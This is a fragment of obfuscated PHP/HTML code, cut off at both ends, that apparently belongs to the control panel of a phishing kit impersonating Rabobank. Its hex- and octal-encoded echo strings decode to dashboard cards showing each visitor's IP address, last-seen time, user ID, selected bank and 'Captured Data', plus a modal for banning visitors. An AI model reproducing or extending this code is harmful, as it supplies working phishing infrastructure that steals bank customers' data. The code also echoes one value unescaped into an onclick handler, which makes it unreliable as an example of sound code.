"\74\144\151\166\x20\x63\154\141\163\163\75\x22\143\157\154\x2d\x31\x32\42\76"; echo "\x3c\144\151\166\x20\x63\154\141\x73\163\75\x22\x63\x6f\x6c\x2d\61\62\x20\142\147\55\x73\165\143\x63\x65\x73\163\x20\x72\x6f\x75\x6e\144\145\x64\42\x3e"; echo "\x3c\x68\61\x20\143\154\x61\163\x73\75\x22\164\x65\x78\164\55\167\x68\x69\x74\x65\x20\164\x65\x78\x74\x2d\x63\x65\156\164\145\162\40\x70\55\x34\42\x20\x69\144\x3d\42\141\x6c\x65\162\164\42\40\x73\164\171\x6c\x65\75\x22\x66\x6f\156\164\55\163\x69\172\x65\72\x20\x31\56\x35\x72\145\155\x22\76\x3c\x69\40\x63\x6c\x61\163\163\75\x22\x66\x61\40\x66\141\x2d\167\151\x66\151\x22\x20\141\162\151\x61\x2d\x68\151\x64\144\x65\156\75\42\x74\x72\165\x65\42\76\x3c\x2f\x69\x3e\x20\x43\x75\162\x72\145\156\164\x6c\171\40\117\156\x6c\151\x6e\x65\40\74\x2f\150\x31\x3e"; echo "\x3c\57\144\151\166\76"; } } echo "\74\142\162\x3e\x3c\x73\164\x79\x6c\x65\x3e\56\142\x6f\x72\x64\145\x72\x2d\154\x65\146\164\x2d\x64\141\156\x67\145\x72\40\173\xa\40\x20\x20\x20\142\x6f\x72\144\x65\x72\x2d\x6c\145\146\x74\72\x20\60\56\62\65\162\x65\x6d\40\x73\157\x6c\151\144\x20\43\x31\141\x31\x64\x32\60\x21\x69\155\x70\x6f\162\x74\x61\156\164\x3b\xa\x7d\x3c\x2f\163\164\171\x6c\x65\x3e\74\144\x69\x76\x20\x63\154\x61\163\163\75\x22\x72\x6f\x77\x22\x3e\12\12\x20\x20\40\40\40\x20\40\40\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\x3c\x64\151\166\x20\143\154\x61\x73\x73\75\42\x63\x6f\154\x2d\170\x6c\x2d\63\x20\x63\x6f\x6c\x2d\x6d\x64\55\66\40\x6d\x62\55\x34\x22\x3e\12\x20\40\40\40\x20\40\40\x20\40\x20\40\x20\40\40\40\xa\xa\x20\40\x20\x20\40\40\x20\x20\40\40\40\40\x20\x20\40\x20\x20\x20\40\40\x20\40\40\40\x3c\x64\151\x76\40\143\x6c\x61\x73\163\x3d\x22\143\x61\162\144\40\142\x6f\x72\144\145\162\55\154\145\x66\x74\x2d\144\x61\x6e\x67\x65\162\40\143\x75\x73\x74\x6f\155\55\142\x6f\x72\144\x65\162\40\142\147\x2d\144\141\162\x6b\145\162\x20\x68\x2d\61\x30\x30\x20\x70\x79\55\62\42\76\xa\12\x20\x20\x20\x20\x20\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\40\x20\x20\40\40\40\40\40\74\x64\151\166\40\x63\154\141\163\x73\75\42\x63\141\162\x64\55\142\x6f\144\171\x22\76\xa\12\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\x20\40\40\40\x20\x20\40\40\40\40\x20\x20\40\40\40\40\x20\x20\74\144\151\166\40\x63\x6c\x61\163\163\75\42\162\x6f\167\40\156\157\x2d\x67\x75\x74\164\x65\162\x73\x20\x61\x6c\151\x67\156\55\x69\164\145\x6d\x73\x2d\x63\145\156\164\145\x72\42\76\12\x20\x20\40\x20\40\x20\x20\40\x20\40\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\x20\x3c\x64\151\x76\x20\143\x6c\141\163\163\x3d\x22\143\157\x6c\x20\155\162\x2d\x32\x22\76\12\xa\x20\x20\40\40\x20\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\40\40\x20\40\40\40\x20\40\40\40\40\40\x3c\x64\151\x76\40\x63\x6c\141\x73\163\x3d\x22\x74\x65\170\164\x2d\x78\163\40\x66\x6f\x6e\x74\x2d\x77\145\x69\147\150\164\x2d\142\157\x6c\144\x20\143\x75\x73\x74\157\155\x2d\x74\x65\x78\164\40\164\145\170\x74\55\165\x70\x70\x65\162\x63\141\163\x65\x20\155\142\x2d\61\42\76\xa\x20\40\x20\x20\40\x20\40\x20\40\40\40\40\x20\40\x20\x20\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\40\40\40\x20\40\40\x20\40\40\40\40\74\151\40\143\154\141\x73\163\x3d\42\x66\141\40\x66\141\x2d\x63\154\157\x63\x6b\42\x20\x61\x72\x69\141\x2d\x68\x69\144\x64\145\x6e\x3d\x22\x74\x72\165\145\x22\76\74\x2f\x69\x3e\x20\74\x2f\151\76\x4c\x61\x73\x74\40\123\x65\x65\156\74\57\144\x69\166\76\12\x20\40\40\x20\40\x20\x20\x20\40\40\40\40\x20\40\40\40\40\x20\40\40\x20\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\40\40\x3c\144\x69\x76\40\x63\x6c\141\163\163\75\42\150\65\40\x6d\x62\x2d\x30\40\146\x6f\x6e\164\55\x77\x65\x69\x67\x68\x74\x2d\x62\x6f\x6c\x64\x20\x74\x65\x78\164\x2d\x77\x68\151\x74\x65\42\x3e" . $timeString . "\74\57\144\151\166\76\12\x20\40\40\x20\40\x20\x20\40\40\x20\40\40\40\40\x20\x20\x20\40\40\x20\x20\40\40\40\40\40\40\x20\40\40\x20\40\x20\x20\x20\x20\x3c\57\x64\x69\166\76\12\x20\40\40\x20\40\x20\x20\40\x20\40\40\x20\40\40\40\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\151\166\40\x63\154\x61\x73\163\75\42\x63\x6f\x6c\55\141\x75\x74\x6f\42\76\xa\x20\40\x20\x20\x20\40\x20\40\x20\40\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\40\40\12\x20\x20\x20\40\40\40\x20\x20\x20\x20\40\x20\40\40\x20\40\40\40\40\40\40\x20\40\40\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\40\74\x2f\x64\x69\166\x3e\xa\x20\x20\x20\x20\40\40\x20\x20\40\x20\x20\40\x20\40\x20\40\40\40\x20\x20\40\x20\40\40\x20\x20\40\40\x20\40\40\x20\x3c\x2f\x64\151\166\76\xa\x20\x20\40\40\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x3c\x2f\144\x69\166\x3e\xa\40\x20\x20\x20\40\40\40\x20\40\x20\40\40\x20\40\40\40\x20\x20\x20\40\40\40\40\40\x3c\57\x64\x69\x76\76\12\40\x20\x20\x20\x20\x20\x20\40\40\40\x20\40\x20\40\40\x20\x20\x20\40\x20\x3c\x2f\x64\x69\166\x3e\xa\40\x20\40\40\x20\x20\x20\x20\40\40\x20\40\40\x20\x20\x20\40\40\40\40\x3c\x64\151\x76\40\143\x6c\x61\x73\x73\x3d\x22\143\157\154\x2d\170\154\55\x33\40\x63\157\154\x2d\155\x64\x2d\x36\x20\x6d\x62\x2d\x34\42\76\xa\40\x20\40\x20\x20\x20\x20\40\40\40\40\40\40\x20\x20\40\40\x20\40\x20\x20\x20\x20\40\74\144\x69\166\x20\143\x6c\x61\163\x73\x3d\x22\143\x61\162\x64\40\142\157\162\x64\x65\162\55\x6c\145\146\x74\55\144\x61\x6e\147\145\x72\x20\143\165\163\164\157\x6d\55\142\x6f\x72\x64\x65\162\40\142\147\x2d\144\141\x72\153\145\x72\40\150\55\x31\60\60\40\x70\171\x2d\x32\42\76\12\x20\x20\40\40\40\40\40\x20\40\40\x20\x20\x20\40\x20\40\40\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\74\x64\x69\166\40\x63\154\141\x73\x73\75\x22\x63\141\x72\x64\55\x62\x6f\x64\x79\42\x3e\12\x20\x20\x20\40\40\40\40\40\40\40\40\40\x20\40\x20\40\40\x20\40\40\x20\40\40\x20\40\x20\x20\x20\x20\40\40\40\74\144\x69\x76\x20\143\x6c\141\x73\163\75\42\162\157\x77\x20\156\x6f\x2d\147\165\164\x74\145\162\163\x20\141\x6c\x69\147\156\55\151\x74\145\x6d\x73\x2d\x63\145\156\164\x65\162\x22\76\xa\40\40\40\x20\40\x20\40\40\x20\x20\40\40\x20\40\40\x20\x20\40\40\x20\x20\x20\40\40\x20\40\x20\40\40\x20\x20\x20\x20\40\x20\40\x3c\x64\151\x76\x20\143\154\141\163\x73\x3d\x22\143\157\154\x20\x6d\x72\55\x32\42\x3e\12\40\x20\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\40\40\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20\x3c\144\x69\x76\40\143\x6c\x61\163\163\75\x22\x74\x65\170\x74\x2d\x78\163\x20\146\x6f\x6e\x74\x2d\x77\x65\151\x67\x68\x74\x2d\142\157\x6c\x64\40\143\x75\163\x74\x6f\155\x2d\164\145\x78\164\40\164\145\x78\164\x2d\x75\x70\160\x65\x72\x63\141\x73\x65\x20\x6d\142\x2d\x31\42\x3e\12\40\x20\40\40\x20\40\40\40\x20\x20\40\x20\x20\x20\40\x20\40\40\40\40\40\x20\x20\40\x20\x20\x20\40\40\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\40\40\x20\74\x69\40\143\154\141\163\x73\x3d\x22\x66\x61\40\x66\141\55\151\156\146\157\55\143\x69\x72\x63\x6c\x65\x22\x20\x61\x72\x69\141\55\x68\151\144\144\x65\156\x3d\42\164\162\165\x65\x22\76\74\57\x69\x3e\40\x49\120\x20\x41\104\104\122\105\x53\x53\x3c\x2f\144\x69\166\76\xa\40\x20\40\40\40\x20\x20\40\40\40\40\x20\40\40\40\x20\40\x20\40\x20\40\40\40\40\40\40\x20\x20\x20\x20\40\40\40\40\40\40\x20\40\40\x20\x3c\144\151\166\40\x63\154\x61\163\x73\75\42\150\x35\x20\x6d\142\55\60\40\146\157\x6e\x74\55\x77\x65\151\147\x68\x74\x2d\142\157\x6c\x64\x20\164\x65\170\x74\55\167\x68\151\164\145\42\x3e" . $log["\151\160"] . "\74\57\x64\151\x76\x3e\xa\x20\40\x20\40\40\40\40\x20\40\x20\40\x20\x20\40\40\40\x20\x20\x20\40\40\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\40\x20\40\x20\x20\74\57\144\x69\166\76\xa\40\40\40\x20\x20\x20\40\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\40\x20\74\144\151\166\x20\143\154\x61\x73\x73\x3d\42\x63\x6f\x6c\55\x61\x75\164\x6f\42\76\xa\40\40\x20\40\40\40\40\x20\40\x20\x20\40\x20\40\40\40\40\40\40\x20\40\40\40\40\40\40\40\40\40\40\40\x20\12\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\40\x20\x20\x20\40\40\40\40\40\x20\40\40\40\40\40\x20\x20\x20\x20\40\x20\40\x20\x20\40\x3c\57\x64\151\166\x3e\xa\40\40\40\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\74\x2f\x64\x69\x76\x3e\12\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\40\40\x20\x20\40\40\40\x20\x20\74\57\x64\151\x76\x3e\12\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\40\40\40\40\40\x20\40\x20\x3c\57\144\x69\x76\76\xa\x20\40\40\x20\x20\40\40\40\40\x20\40\40\x20\40\x20\40\40\40\40\x20\74\57\144\x69\x76\x3e\12\40\x20\x20\40\40\40\x20\40\40\x20\40\x20\40\x20\x20\x20\x20\40\40\x20\74\144\x69\x76\x20\x63\x6c\141\x73\163\75\x22\x63\157\x6c\55\x78\154\x2d\x33\x20\x63\x6f\x6c\55\155\x64\55\x36\40\155\x62\55\x34\42\x3e\12\40\x20\40\x20\40\x20\40\x20\x20\40\x20\40\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\74\x64\151\x76\40\x63\154\x61\x73\x73\75\x22\143\x61\162\x64\40\x62\x6f\162\x64\145\x72\55\x6c\145\x66\164\55\144\141\156\147\145\162\40\143\x75\x73\x74\157\155\55\x62\157\x72\144\145\x72\x20\x62\147\55\x64\141\x72\153\145\162\x20\x68\x2d\61\x30\60\x20\160\171\55\x32\x22\76\xa\x20\x20\x20\40\40\40\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\40\40\x20\40\40\40\40\x20\40\x20\40\x3c\144\151\166\40\143\154\141\163\163\75\42\x63\x61\162\x64\55\142\x6f\x64\x79\42\x3e\xa\x20\40\40\40\40\40\x20\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\74\144\151\x76\40\x63\154\141\163\163\75\42\162\157\167\x20\156\x6f\55\147\x75\x74\x74\x65\x72\163\x20\141\x6c\151\x67\x6e\x2d\x69\164\x65\155\163\55\143\x65\x6e\x74\145\162\42\76\12\x20\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\40\x20\40\40\x20\x20\40\40\40\40\x20\x20\40\x20\74\x64\151\x76\x20\x63\x6c\141\x73\163\75\x22\x63\x6f\x6c\x20\155\162\55\x32\42\76\12\x20\40\x20\40\x20\x20\40\x20\40\40\40\x20\40\40\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\40\40\40\40\40\x20\x20\40\40\40\x20\40\40\40\x3c\144\151\x76\x20\143\x6c\141\163\x73\75\42\164\x65\170\164\55\170\x73\40\x66\157\x6e\164\55\x77\145\x69\147\150\x74\55\142\x6f\x6c\x64\x20\x63\165\163\164\x6f\155\55\164\x65\x78\x74\x20\x74\145\170\x74\x2d\x75\x70\x70\x65\162\x63\x61\163\145\x20\155\142\55\x31\42\76\12\40\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\40\40\x20\x20\40\40\x20\x20\x20\40\x20\40\x20\40\x20\40\40\40\x20\40\40\40\40\x3c\151\x20\x63\x6c\x61\163\x73\75\x22\146\141\40\146\141\x2d\x69\x64\x2d\x63\141\162\x64\42\x20\141\x72\151\x61\x2d\x68\x69\x64\144\x65\156\75\x22\x74\162\165\x65\x22\x3e\74\x2f\x69\76\40\125\x73\x65\x72\40\111\104\74\57\x64\151\166\x3e\12\x20\40\40\40\40\40\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\40\40\40\x20\x20\40\x20\x20\x20\40\x20\40\x20\40\x3c\144\x69\166\x20\143\154\x61\x73\x73\x3d\x22\x68\65\40\155\142\55\x30\40\146\x6f\x6e\x74\55\167\x65\x69\x67\x68\164\x2d\x62\157\x6c\144\x20\x74\x65\170\164\55\167\x68\151\164\x65\x22\x3e" . $log["\165\x73\x65\x72\x5f\x69\x64"] . "\x3c\57\144\x69\166\x3e\xa\40\40\x20\x20\40\x20\x20\40\x20\x20\40\40\40\x20\40\x20\40\x20\40\40\x20\40\x20\x20\x20\40\40\x20\40\40\40\x20\x20\x20\40\40\x3c\x2f\144\x69\x76\76\12\x20\x20\40\40\40\x20\x20\40\x20\40\40\x20\x20\40\40\x20\40\40\x20\40\x20\40\x20\40\x20\40\40\40\40\x20\x20\40\40\x20\x20\x20\74\x64\x69\x76\40\143\x6c\141\163\163\75\x22\143\x6f\x6c\55\x61\165\x74\157\42\x3e\xa\xa\40\40\40\40\40\x20\40\x20\40\40\40\40\40\x20\40\40\40\40\40\40\x20\40\40\x20\40\40\40\x20\40\x20\40\x20\40\40\40\x20\x3c\x2f\144\x69\x76\x3e\12\x20\40\40\40\40\40\40\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\40\x20\x20\40\40\x20\40\x20\40\74\57\144\151\x76\x3e\12\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\40\x3c\57\144\151\x76\x3e\xa\x20\40\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\40\40\40\x20\40\40\40\x20\x20\74\x2f\144\151\x76\x3e\xa\40\x20\x20\40\x20\40\x20\x20\40\x20\40\40\40\x20\x20\40\x20\x20\x20\40\74\x2f\144\x69\x76\76\xa\x20\x20\x20\40\40\x20\x20\40\40\40\40\x20\x20\40\40\40\40\x20\x20\40\74\144\151\166\40\143\154\x61\x73\163\x3d\42\x63\x6f\x6c\55\x78\154\x2d\x33\40\143\157\x6c\55\155\x64\x2d\66\x20\x6d\x62\55\x34\x22\x3e\xa\x20\x20\40\x20\40\40\40\x20\40\40\x20\40\40\x20\40\x20\40\40\x20\40\x20\40\40\40\74\x64\x69\x76\40\143\x6c\x61\163\163\x3d\x22\143\x61\162\144\40\x62\x6f\x72\144\145\162\x2d\x6c\145\146\x74\x2d\x64\x61\156\147\x65\x72\x20\x63\x75\163\164\x6f\x6d\x2d\142\x6f\162\x64\x65\x72\x20\142\x67\55\x64\x61\162\x6b\145\x72\40\150\x2d\61\60\60\x20\160\x79\x2d\62\x22\x3e\12\x20\40\40\40\40\x20\40\40\40\40\x20\40\x20\x20\40\x20\40\40\x20\40\x20\40\x20\40\40\x20\x20\40\x3c\x64\x69\166\40\143\154\x61\x73\x73\x3d\42\x63\x61\162\x64\x2d\x62\x6f\144\x79\x22\76\12\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\40\x20\40\x20\x20\x20\40\40\x20\40\40\40\x20\40\x20\x3c\x64\151\x76\x20\x63\x6c\141\163\x73\75\x22\x72\x6f\167\x20\156\157\x2d\147\165\x74\164\145\x72\x73\40\141\154\151\x67\156\55\151\x74\145\x6d\x73\x2d\143\145\x6e\x74\x65\x72\x22\76\xa\40\40\40\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\x20\40\40\40\x20\40\40\40\x20\x20\x20\40\x20\40\x20\x20\40\x20\40\x20\40\x3c\x64\x69\166\x20\143\154\x61\x73\163\75\x22\x63\157\154\x20\155\162\55\62\42\76\12\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\40\40\74\x64\151\x76\x20\x63\154\141\163\163\75\x22\x74\x65\x78\x74\55\x78\163\40\146\x6f\156\x74\55\x77\x65\151\x67\x68\164\55\142\x6f\x6c\144\x20\143\x75\x73\164\157\x6d\x2d\x74\x65\x78\164\40\164\145\170\164\55\165\x70\x70\145\x72\x63\x61\163\x65\40\155\x62\x2d\x31\42\76\12\40\40\40\x20\40\40\40\x20\x20\40\40\x20\x20\40\x20\40\x20\x20\40\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\x20\74\151\40\x63\x6c\141\163\x73\x3d\42\146\141\x20\x66\x61\55\165\156\151\x76\145\x72\x73\151\x74\x79\42\x20\x61\x72\x69\x61\55\x68\151\x64\144\145\x6e\75\42\164\162\x75\145\x22\x3e\x3c\57\151\76\x20\102\x61\156\x6b\74\x2f\144\x69\x76\76\12\40\x20\40\x20\40\40\x20\40\x20\x20\x20\40\x20\x20\x20\x20\40\40\x20\40\x20\40\40\x20\40\40\40\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\40\74\x64\151\x76\40\x63\x6c\x61\x73\x73\75\x22\x68\x35\40\x6d\x62\x2d\60\40\146\x6f\x6e\164\55\167\145\151\x67\150\x74\x2d\142\157\x6c\144\40\164\x65\x78\x74\x2d\x77\150\151\x74\145\x22\76" . (empty($log["\x62\141\156\x6b"]) ? "\x4e\x4f\124\x20\123\105\x4c\x45\x43\x54\x45\104" : $log["\142\x61\156\153"]) . "\x3c\x2f\x64\x69\166\x3e\xa\40\40\40\40\40\x20\40\x20\40\x20\40\40\x20\x20\x20\40\40\40\x20\40\40\x20\40\x20\x20\40\40\x20\40\x20\x20\x20\40\40\x20\x20\x3c\x2f\144\x69\166\x3e\12\40\40\40\40\40\40\x20\40\x20\x20\x20\40\40\x20\40\x20\x20\x20\x20\40\40\40\40\x20\40\x20\40\40\x20\40\x20\40\x20\x20\x20\x20\74\144\151\166\40\143\x6c\141\163\x73\x3d\x22\x63\x6f\x6c\x2d\141\x75\x74\157\x22\76\12\12\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\40\x20\40\x20\40\x20\40\40\x20\x20\40\x3c\57\144\x69\x76\76\xa\x20\40\x20\x20\40\40\40\40\x20\40\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\74\57\144\x69\166\x3e\xa\40\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\40\40\x20\40\40\40\40\x20\x20\40\40\x3c\57\144\151\166\x3e\xa\40\40\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\40\x20\40\x20\40\40\x20\x20\40\x20\x3c\57\x64\151\166\x3e\xa\40\40\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\x3c\57\144\x69\166\x3e\xa\40\40\40\x20\40\x20\x20\x20\x20\x20\40\x20\40\40\40\40\74\57\x64\x69\166\76"; echo "\x3c\x2f\x64\x69\x76\76"; echo "\x3c\x2f\x64\151\166\x3e"; echo "\x3c\57\144\x69\166\76"; echo "\x3c\57\144\x69\166\x3e"; echo "\74\163\x74\171\x6c\145\x20\164\x79\x70\145\x3d\x22\x74\x65\x78\x74\57\143\x73\x73\x22\x3e\xa\40\40\x20\x20\x2e\x6d\157\144\141\x6c\55\x68\145\141\x64\145\x72\40\x7b\xa\40\x20\x20\40\144\151\163\160\154\x61\171\x3a\x20\146\154\145\x78\73\12\40\40\x20\40\141\154\x69\x67\x6e\55\x69\x74\x65\155\163\x3a\40\x66\154\145\x78\x2d\163\x74\141\x72\x74\73\12\x20\x20\40\x20\152\165\163\164\151\146\x79\55\143\157\x6e\164\145\156\x74\x3a\x20\x73\160\x61\143\x65\x2d\x62\145\x74\x77\x65\145\x6e\73\xa\40\40\x20\x20\x70\x61\x64\144\x69\x6e\147\x3a\40\x31\162\145\x6d\40\x31\x72\x65\155\x3b\xa\x20\x20\40\x20\x62\157\x72\x64\145\x72\x2d\x62\x6f\x74\x74\157\x6d\x3a\40\x31\x70\170\40\163\157\x6c\151\144\x20\43\62\60\62\60\x32\60\73\12\x20\x20\40\x20\142\x6f\162\x64\145\x72\55\x74\x6f\160\55\154\x65\146\x74\x2d\x72\x61\144\x69\165\163\72\40\143\141\154\143\50\x30\56\x33\162\145\x6d\x20\x2d\40\61\160\170\51\x3b\xa\40\40\40\x20\142\x6f\162\x64\x65\x72\55\x74\x6f\160\x2d\162\x69\147\150\164\55\x72\x61\144\151\165\163\x3a\x20\143\x61\x6c\x63\x28\60\x2e\63\162\145\x6d\40\55\40\61\x70\x78\51\73\xa\175\xa\56\155\157\144\141\x6c\x2d\146\x6f\x6f\x74\x65\x72\x20\173\xa\40\40\x20\40\x64\x69\163\160\154\141\171\72\40\x66\x6c\x65\170\x3b\xa\x20\40\x20\x20\146\154\x65\170\x2d\167\162\141\x70\x3a\40\x77\x72\x61\x70\x3b\12\x20\x20\x20\x20\x61\x6c\x69\x67\156\x2d\151\x74\145\155\x73\x3a\x20\x63\145\156\x74\x65\x72\73\12\x20\40\x20\x20\152\165\x73\x74\x69\x66\x79\x2d\143\157\156\x74\x65\156\x74\72\40\x66\x6c\145\x78\x2d\x65\156\144\x3b\12\x20\x20\40\40\160\x61\x64\x64\x69\x6e\x67\72\40\60\56\67\x35\x72\145\x6d\73\xa\x20\40\x20\x20\142\x6f\x72\x64\x65\162\x2d\164\x6f\x70\72\40\61\x70\170\40\x73\157\x6c\x69\x64\40\43\62\x30\x32\x30\x32\x30\x3b\xa\x20\40\x20\x20\x62\157\x72\x64\x65\162\55\x62\x6f\164\x74\x6f\155\x2d\162\151\x67\150\x74\x2d\x72\141\x64\x69\x75\163\72\x20\143\141\x6c\x63\50\60\x2e\x33\x72\145\x6d\40\55\40\61\x70\x78\x29\x3b\12\40\x20\40\x20\142\157\x72\144\x65\x72\x2d\x62\x6f\x74\164\x6f\x6d\55\154\145\146\164\55\162\x61\144\x69\x75\x73\x3a\x20\x63\141\x6c\x63\50\60\56\x33\x72\145\155\40\x2d\40\61\160\x78\51\73\12\175\xa\xa\56\x73\151\151\x6c\145\156\x63\x65\x64\55\144\x61\162\153\145\162\x20\x7b\12\x20\x20\40\x20\142\141\143\153\147\162\157\165\x6e\144\x2d\x63\157\154\157\x72\x3a\40\x23\61\143\x31\143\x31\143\73\12\175\xa\x3c\x2f\x73\164\x79\154\x65\76\74\x21\55\55\x20\122\x61\142\157\142\x61\x6e\153\x20\x4d\157\144\141\154\x20\x2d\x2d\x3e"; echo ''; ?>
<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
  <div class="modal-dialog modal-dialog-centered" role="document">
    <div class="modal-content bg-darker">
      <div class="modal-header siilenced-darker">
        <h5 class="modal-title" id="exampleModalLongTitle"><i class="fa fa-ban" aria-hidden="true"></i> Are you sure u want to ban user?</h5>
      </div>
      <div class="modal-body">
        <p style="font-style: italic;">This action cannot be undone.</p>


        <hr>

        <p><i class="fa fa-database" aria-hidden="true"></i> Fetching Details <img height="15" width="15" src="/img/ing.gif"></p>
<style>
siilenced { 
  font-family: monospace;
}
</style><div class="card-body">
<div class="card mb-1 siilenced-darker rounded  custom-card">

<p><siilenced> Ip_address: <?php  echo htmlspecialchars($ip); ?>
 </siilenced></p>
<p><siilenced> user_agent: <?php  echo htmlspecialchars($log["\x75\x73\x65\162\137\141\x67\x65\156\164"]); ?>
</siilenced></p>
<p><siilenced> user_id: <?php  echo htmlspecialchars($log["\x75\x73\x65\x72\x5f\x69\144"]); ?>
</siilenced></p>
<br><br>
</div>
      </div>
      <div class="modal-footer">
        <button type="button" class="btn btn-outline-primary" data-dismiss="modal"><i class="fa fa-times" aria-hidden="true"></i> Close</button>
        <button class="btn btn-outline-danger"  data-dismiss="modal" onclick="banUser('<?php  echo $log["\x69\160"]; ?>
', '<?php  echo $log["\x75\163\x65\162\137\x69\x64"]; ?>
')"><i class="fa fa-check" aria-hidden="true"></i> Yes</button>


       <?php  echo "\x3c\57\x64\151\166\x3e\12\40\x20\x20\x20\x20\x20\x3c\57\144\151\x76\76\12\40\40\40\40\x3c\57\144\151\166\x3e\xa\x20\40\74\x2f\x64\x69\x76\x3e\12\40\74\x2f\144\x69\x76\76\12\74\x2f\x64\151\166\76"; echo "\74\41\x2d\x2d\40\105\156\144\x20\122\141\142\157\x62\141\156\153\40\115\157\144\x61\154\x20\55\55\76"; echo "\x3c\163\164\x79\x6c\145\x3e\xa\40\x20\x20\x20\40\40\40\x20\56\143\x61\162\x64\55\x68\145\x61\144\x65\162\40\173\12\40\40\40\40\x70\x61\x64\x64\x69\x6e\147\72\x20\x30\56\x37\x35\x72\x65\155\x20\x31\x2e\x32\x35\162\145\x6d\x3b\12\40\40\40\40\x6d\141\x72\147\x69\x6e\x2d\142\x6f\x74\164\x6f\155\x3a\x20\60\73\xa\x20\40\x20\40\x62\x61\x63\x6b\x67\x72\157\x75\x6e\x64\55\143\x6f\x6c\x6f\x72\x3a\x20\x23\61\x65\x31\144\x31\x64\73\12\x20\40\x20\x20\142\x6f\162\x64\x65\162\x2d\x62\x6f\x74\164\157\x6d\72\40\61\160\x78\x20\163\157\x6c\x69\144\40\43\x32\x30\x32\x30\62\60\73\12\x7d\x3c\57\163\x74\171\154\145\x3e\x3c\x64\151\166\40\x63\154\x61\x73\x73\75\42\x72\157\x77\40\160\55\61\x22\x3e"; echo "\x3c\144\151\166\x20\143\154\141\x73\163\75\42\143\157\x6c\x2d\154\x67\55\x38\40\143\x6f\x6c\55\163\155\55\x31\62\x22\76"; echo "\74\144\x69\x76\x20\143\154\141\163\x73\75\42\143\141\x72\x64\55\x68\x65\141\144\x65\x72\40\164\145\170\164\x2d\167\150\x69\x74\x65\x20\40\x62\147\55\144\141\x72\153\145\x72\x20\163\x69\x69\154\x65\x6e\143\145\x64\55\144\x61\x72\x6b\x65\162\x22\76\12\40\40\x20\40\x20\x20\40\x20\40\x20\x20\40\x3c\151\x20\143\x6c\x61\x73\x73\x3d\42\x66\141\40\146\141\55\151\x6e\x66\x6f\x2d\143\x69\x72\143\x6c\x65\x22\x20\141\x72\x69\x61\x2d\x68\151\x64\x64\x65\x6e\75\42\x74\162\165\x65\x22\x3e\74\57\x69\x3e\40\103\x61\x70\x74\165\162\x65\x64\x20\104\141\x74\141\12\xa\12\xa\x20\40\40\40\x20\x20\x20\40\x20\40\x20\40\74\x2f\x64\151\x76\76\74\144\x69\166\40\143\154\x61\x73\x73\x3d\x22\x63\x6f\154\x2d\x31\x32\x20\x70\55\64\40\142\147\x2d\144\x61\x72\x6b\145\x72\42\76"; echo "\74\144\151\166\40\x63\x6c\x61\x73\x73\75\x22\x76\145\x75\163\x64\x65\160\x75\164\40\x70\55\64\40\162\x6f\x75\x6e\x64\x65\x64\42\76\x20"; if 